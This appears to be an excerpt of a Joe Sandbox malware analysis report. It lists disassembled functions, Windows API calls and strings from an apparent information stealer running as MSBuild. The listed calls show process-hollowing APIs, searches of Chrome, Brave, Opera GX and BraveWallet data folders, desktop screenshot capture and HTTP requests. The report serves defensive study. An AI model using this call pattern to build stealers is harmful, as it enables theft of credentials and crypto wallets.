GetProcAddress.KERNEL32 ref: 00418B93
GetProcAddress.KERNEL32 ref: 00418BAA
GetProcAddress.KERNEL32 ref: 00418BC1
GetProcAddress.KERNEL32 ref: 00418BD8
GetProcAddress.KERNEL32 ref: 00418BEF
GetProcAddress.KERNEL32 ref: 00418C06
GetProcAddress.KERNEL32 ref: 00418C1D
GetProcAddress.KERNEL32 ref: 00418C34
GetProcAddress.KERNEL32 ref: 00418C4B
GetProcAddress.KERNEL32 ref: 00418C62
GetProcAddress.KERNEL32 ref: 00418C79
GetProcAddress.KERNEL32 ref: 00418C90
GetProcAddress.KERNEL32 ref: 00418CA7
GetProcAddress.KERNEL32 ref: 00418CBE
GetProcAddress.KERNEL32 ref: 00418CD5
GetProcAddress.KERNEL32 ref: 00418CEC
GetProcAddress.KERNEL32 ref: 00418D03
GetProcAddress.KERNEL32 ref: 00418D1A
GetProcAddress.KERNEL32 ref: 00418D31
GetProcAddress.KERNEL32 ref: 00418D48
GetProcAddress.KERNEL32 ref: 00418D5F
GetProcAddress.KERNEL32 ref: 00418D76
GetProcAddress.KERNEL32 ref: 00418D8D
GetProcAddress.KERNEL32 ref: 00418DA4
GetProcAddress.KERNEL32 ref: 00418DBB
GetProcAddress.KERNEL32 ref: 00418DD2
GetProcAddress.KERNEL32 ref: 00418DE9
GetProcAddress.KERNEL32 ref: 00418E00
GetProcAddress.KERNEL32 ref: 00418E17
GetProcAddress.KERNEL32 ref: 00418E2E
GetProcAddress.KERNEL32 ref: 00418E45
GetProcAddress.KERNEL32 ref: 00418E5C
GetProcAddress.KERNEL32 ref: 00418E73
GetProcAddress.KERNEL32 ref: 00418E8A
GetProcAddress.KERNEL32 ref: 00418EA1
GetProcAddress.KERNEL32 ref: 00418EB8
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418ECE
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418EE4
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418EFA
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418F10
GetProcAddress.KERNEL32(ResumeThread), ref: 00418F26
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418F3C
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418F52
LoadLibraryA.KERNEL32(00417456), ref: 00418F63
LoadLibraryA.KERNEL32 ref: 00418F74
LoadLibraryA.KERNEL32 ref: 00418F85
LoadLibraryA.KERNEL32 ref: 00418F96
LoadLibraryA.KERNEL32 ref: 00418FA7
LoadLibraryA.KERNEL32 ref: 00418FB8
LoadLibraryA.KERNEL32 ref: 00418FC9
LoadLibraryA.KERNEL32 ref: 00418FDA
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418FEA
GetProcAddress.KERNEL32(75FD0000), ref: 00419005
GetProcAddress.KERNEL32 ref: 0041901C
GetProcAddress.KERNEL32 ref: 00419033
GetProcAddress.KERNEL32 ref: 0041904A
GetProcAddress.KERNEL32 ref: 00419061
GetProcAddress.KERNEL32(734B0000), ref: 00419080
GetProcAddress.KERNEL32 ref: 00419097
GetProcAddress.KERNEL32 ref: 004190AE
GetProcAddress.KERNEL32 ref: 004190C5
GetProcAddress.KERNEL32 ref: 004190DC
GetProcAddress.KERNEL32 ref: 004190F3
GetProcAddress.KERNEL32 ref: 0041910A
GetProcAddress.KERNEL32 ref: 00419121
GetProcAddress.KERNEL32(763B0000), ref: 0041913C
GetProcAddress.KERNEL32 ref: 00419153
GetProcAddress.KERNEL32 ref: 0041916A
GetProcAddress.KERNEL32 ref: 00419181
GetProcAddress.KERNEL32 ref: 00419198
GetProcAddress.KERNEL32(750F0000), ref: 004191B7
GetProcAddress.KERNEL32 ref: 004191CE
GetProcAddress.KERNEL32 ref: 004191E5
GetProcAddress.KERNEL32 ref: 004191FC
GetProcAddress.KERNEL32 ref: 00419213
GetProcAddress.KERNEL32 ref: 0041922A
GetProcAddress.KERNEL32(75A50000), ref: 00419249
GetProcAddress.KERNEL32 ref: 00419260
GetProcAddress.KERNEL32 ref: 00419277
GetProcAddress.KERNEL32 ref: 0041928E
GetProcAddress.KERNEL32 ref: 004192A5
GetProcAddress.KERNEL32 ref: 004192BC
GetProcAddress.KERNEL32 ref: 004192D3
GetProcAddress.KERNEL32 ref: 004192EA
GetProcAddress.KERNEL32 ref: 00419301
GetProcAddress.KERNEL32(75070000), ref: 0041931C
GetProcAddress.KERNEL32 ref: 00419333
GetProcAddress.KERNEL32 ref: 0041934A
GetProcAddress.KERNEL32 ref: 00419361
GetProcAddress.KERNEL32 ref: 00419378
GetProcAddress.KERNEL32(74E50000), ref: 00419393
GetProcAddress.KERNEL32 ref: 004193AA
GetProcAddress.KERNEL32(75320000), ref: 004193C5
GetProcAddress.KERNEL32 ref: 004193DC
GetProcAddress.KERNEL32(6F060000), ref: 004193FB
GetProcAddress.KERNEL32 ref: 00419412
GetProcAddress.KERNEL32 ref: 00419429
GetProcAddress.KERNEL32 ref: 00419440
GetProcAddress.KERNEL32 ref: 00419457
GetProcAddress.KERNEL32 ref: 0041946E
GetProcAddress.KERNEL32 ref: 00419485
GetProcAddress.KERNEL32 ref: 0041949C
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004194B2
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004194C8
GetProcAddress.KERNEL32(74E00000), ref: 004194E3
GetProcAddress.KERNEL32 ref: 004194FA
GetProcAddress.KERNEL32 ref: 00419511
GetProcAddress.KERNEL32 ref: 00419528
GetProcAddress.KERNEL32(74DF0000), ref: 00419543
GetProcAddress.KERNEL32(6CF70000), ref: 0041955E
GetProcAddress.KERNEL32 ref: 00419575
GetProcAddress.KERNEL32 ref: 0041958C
GetProcAddress.KERNEL32 ref: 004195A3
GetProcAddress.KERNEL32(6CD80000,SymMatchString), ref: 004195BD

Strings

ResumeThread, xrefs: 00418F16
WriteProcessMemory, xrefs: 00418F2C
GetThreadContext, xrefs: 00418ED4
VirtualAllocEx, xrefs: 00418F00
SetThreadContext, xrefs: 00418F42
HttpQueryInfoA, xrefs: 004194A2
SymMatchString, xrefs: 004195B7
ReadProcessMemory, xrefs: 00418EEA
InternetSetOptionA, xrefs: 004194B8
dbghelp.dll, xrefs: 00418FE0
CreateProcessA, xrefs: 00418EBE

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: bc716f2625a0e41b2ed4bb766179c27d34b4bc4e0803ef392b74f70fe9059fed
Instruction ID: 5449bedc0755d092c63345477a9aa1600d2668e98cfd9be5b3c345c13cb74e3e
Opcode Fuzzy Hash: bc716f2625a0e41b2ed4bb766179c27d34b4bc4e0803ef392b74f70fe9059fed
Instruction Fuzzy Hash: FF52F975911312AFDF1ADFA0FD0A8243AABFB08203F11B566E91982274D7774B60EF15

Function 00414D08 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D5C
FindFirstFileA.KERNEL32(?,?), ref: 00414D73
_memset.LIBCMT ref: 00414D8F
_memset.LIBCMT ref: 00414DA0
StrCmpCA.SHLWAPI(?,00436A00), ref: 00414DC1
StrCmpCA.SHLWAPI(?,00436A04), ref: 00414DDB
wsprintfA.USER32 ref: 00414E02
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414E16
wsprintfA.USER32 ref: 00414E3F
wsprintfA.USER32 ref: 00414E56

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

_memset.LIBCMT ref: 00414E68
lstrcatA.KERNEL32(?,?), ref: 00414E7D
strtok_s.MSVCRT ref: 00414EC2
_memset.LIBCMT ref: 00414ED4
lstrcatA.KERNEL32(?,?), ref: 00414EE9
strtok_s.MSVCRT ref: 00414F02
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414F17
DeleteFileA.KERNEL32(?,00436A30,0043661D), ref: 00414FD0
CopyFileA.KERNEL32(?,?,00000001), ref: 00414FE0

Part of subcall function 0041213B: CreateFileA.KERNEL32(OA,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FEC,?), ref: 00412156

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FF6
DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00415001
strtok_s.MSVCRT ref: 00415027
FindNextFileA.KERNELBASE(?,?), ref: 00415145
FindClose.KERNEL32(?), ref: 00415165

Strings

%s\*.*, xrefs: 00414D50
%s\%s, xrefs: 00414DFC
%s\%s, xrefs: 00414E50
%s\%s\%s, xrefs: 00414E39

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 956187361-332874205
Opcode ID: 044d4b6d793c747a03c4e4ceb555f38b31337ca42283ef45f1dc0248f74f94ca
Instruction ID: f4792fa2e0de24f4310c615b8eacfa361ff41c750a784f4b7fd7b6058ad2a589
Opcode Fuzzy Hash: 044d4b6d793c747a03c4e4ceb555f38b31337ca42283ef45f1dc0248f74f94ca
Instruction Fuzzy Hash: 5EC12AB1D0021AABCF22EF60DC45AEA777DAB48304F4140A6FA09B3151DB799F858F59

Function 00409CF1 Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,0043731C,004367EE,?,?,?), ref: 00409D9B
StrCmpCA.SHLWAPI(?,00437320), ref: 00409DBC
StrCmpCA.SHLWAPI(?,00437324), ref: 00409DD6

Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410524
Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410556

StrCmpCA.SHLWAPI(?,Opera GX,00437328,?,004367F3), ref: 00409E68
StrCmpCA.SHLWAPI(?,Brave,00437348,0043734C,00437328,?,004367F3), ref: 00409FEA
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A004
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0C4
DeleteFileA.KERNEL32(?), ref: 0040A193
StrCmpCA.SHLWAPI(?), ref: 0040A1D1
StrCmpCA.SHLWAPI(?), ref: 0040A23B
StrCmpCA.SHLWAPI(0040CCBE), ref: 0040A24E

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

StrCmpCA.SHLWAPI(?), ref: 0040A331
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A3F1
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A496
DeleteFileA.KERNEL32(?), ref: 0040A4F7

Part of subcall function 00408DAC: lstrlenA.KERNEL32(?), ref: 00408FA5
Part of subcall function 00408DAC: lstrlenA.KERNEL32(?), ref: 00408FC0

Part of subcall function 0040951A: lstrlenA.KERNEL32(?), ref: 00409943
Part of subcall function 0040951A: lstrlenA.KERNEL32(?), ref: 0040995E

StrCmpCA.SHLWAPI(?), ref: 0040A528
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A5E8
DeleteFileA.KERNEL32(?), ref: 0040A67F

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

FindNextFileA.KERNEL32(?,?), ref: 0040A743
FindClose.KERNEL32(?), ref: 0040A757

Strings

\BraveWallet\Preferences, xrefs: 0040A0DA
Opera GX, xrefs: 00409E60
Preferences, xrefs: 00409FF8
Google Chrome, xrefs: 0040A48E
Brave, xrefs: 00409FE2

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 4173076446-1189830961
Opcode ID: e8635bd8363d41b1082a31a401baa697065fc449502877a019cbf08002c8d1f9
Instruction ID: 75dad56e9d8fee0ead2f570547e4dadea0663225d1755eb7d3239ac7f3b3eaf4
Opcode Fuzzy Hash: e8635bd8363d41b1082a31a401baa697065fc449502877a019cbf08002c8d1f9
Instruction Fuzzy Hash: 3A421D319002299BCF21FB25DD46BCD7775AF04308F4101AAB948B31A1DBB99ED99F89

Function 6C9D35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CA5F688,00001000), ref: 6C9D35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9D35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C9D35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C9D363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C9D369F
__aulldiv.LIBCMT ref: 6C9D36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C9D3773
EnterCriticalSection.KERNEL32(6CA5F688), ref: 6C9D377E
LeaveCriticalSection.KERNEL32(6CA5F688), ref: 6C9D37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C9D37C4
EnterCriticalSection.KERNEL32(6CA5F688), ref: 6C9D37CB
LeaveCriticalSection.KERNEL32(6CA5F688), ref: 6C9D3801
__aulldiv.LIBCMT ref: 6C9D3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C9D3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C9D3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C9D394C

Strings

QPC, xrefs: 6C9D38FC
MOZ_TIMESTAMP_MODE, xrefs: 6C9D35DB
GenuntelineI, xrefs: 6C9D3639
AuthcAMDenti, xrefs: 6C9D3946
GTC, xrefs: 6C9D3912

Memory Dump Source

Source File: 00000002.00000002.2562751473.000000006C9D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000002.00000002.2562669428.000000006C9D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563101852.000000006CA5E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563152283.000000006CA62000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9d0000_MSBuild.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: fceedd3da51baf2e60163d2e08897efe647d9eebae7bcb86753049655ff75fa4
Instruction ID: ead69456b2cad73626722725c5e6dd3d29671ea54d4bd100dbdda27c0d66be4a
Opcode Fuzzy Hash: fceedd3da51baf2e60163d2e08897efe647d9eebae7bcb86753049655ff75fa4
Instruction Fuzzy Hash: 57B1C071B053419FDB0CDF28C84465AB7F9BB89705F85C92DE899D3B90D730E8428B91

Function 00416013 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041605A
FindFirstFileA.KERNEL32(?,?), ref: 00416071
StrCmpCA.SHLWAPI(?,00436ABC), ref: 00416092
StrCmpCA.SHLWAPI(?,00436AC0), ref: 004160AC
wsprintfA.USER32 ref: 004160D3
StrCmpCA.SHLWAPI(?,00436647), ref: 004160E7
wsprintfA.USER32 ref: 00416104
wsprintfA.USER32 ref: 0041611B
PathMatchSpecA.SHLWAPI(?,?), ref: 00416131
lstrcatA.KERNEL32(?), ref: 00416167
lstrcatA.KERNEL32(?,00436AD8), ref: 00416179
lstrcatA.KERNEL32(?,?), ref: 0041618C
lstrcatA.KERNEL32(?,00436ADC), ref: 0041619E
lstrcatA.KERNEL32(?,?), ref: 004161B2
CopyFileA.KERNEL32(?,?,00000001), ref: 0041626B
DeleteFileA.KERNEL32(?), ref: 004162DF
FindNextFileA.KERNEL32(?,?), ref: 00416341
FindClose.KERNEL32(?), ref: 00416355

Strings

%s\*, xrefs: 0041604E
%s\%s, xrefs: 00416115
%s\%s, xrefs: 004160CD

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 2178766154-445461498
Opcode ID: 0e600d5047ff4d344f6647d74033c88bc6cdbfcf0d3c4df937dfa9cd080451e6
Instruction ID: 79d1f29ff45b39a2e643b57e08e106806d5cc21b67f0aeab8a21c1051b1a5e81
Opcode Fuzzy Hash: 0e600d5047ff4d344f6647d74033c88bc6cdbfcf0d3c4df937dfa9cd080451e6
Instruction Fuzzy Hash: 38813771D0022DABCF20EB61DC49AC977B9BF08305F0190EAE549A3151DF79ABC98F94

Function 00411F2A Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F6B
GetDesktopWindow.USER32 ref: 00411F79
GetWindowRect.USER32(00000000,?), ref: 00411F86
GetDC.USER32(00000000), ref: 00411F8D
CreateCompatibleDC.GDI32(00000000), ref: 00411F96
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FA6
SelectObject.GDI32(?,00000000), ref: 00411FB3
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FCF
GetHGlobalFromStream.COMBASE(?,?), ref: 0041201E
GlobalLock.KERNEL32(?), ref: 00412027
GlobalSize.KERNEL32(?), ref: 00412033

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436976,0043695B,00436957,0043694B), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 00412091
DeleteObject.GDI32(?), ref: 004120AC
DeleteObject.GDI32(?), ref: 004120B5
ReleaseDC.USER32(00000000,00000000), ref: 004120BD
CloseWindow.USER32(00000000), ref: 004120C4

Strings

S|A, xrefs: 004120D2

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID: S|A
API String ID: 2610876673-334106119
Opcode ID: 980765410d643f480cd54b618d10175802e96dbcf96caac3d73940273838e7b7
Instruction ID: 3d5e95dc3a9def40e4f53fb22429b7798ee419803b96b06a4ce8578454b2d249
Opcode Fuzzy Hash: 980765410d643f480cd54b618d10175802e96dbcf96caac3d73940273838e7b7
Instruction Fuzzy Hash: 1151F672800208AFDF15EFA1ED499EEBF7AFF08315F045126FA05E2120D7359A95DB61

Function 0041C603 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0041C6B6
UT, xrefs: 0041C92E

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 9d589ce077f64400bedb7fb22e2da5ebe23a8e2d5892894179c18efc01208e83
Instruction ID: 516228580ed08042d8870343235722f08fed0f414f2ef24f8f764d0f61e269e7
Opcode Fuzzy Hash: 9d589ce077f64400bedb7fb22e2da5ebe23a8e2d5892894179c18efc01208e83
Instruction Fuzzy Hash: AE027DB19442688BDF21DF68CC807EEBBB5AF45304F0444EAD949A7242D7389EC5CF99

Function 00406963 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
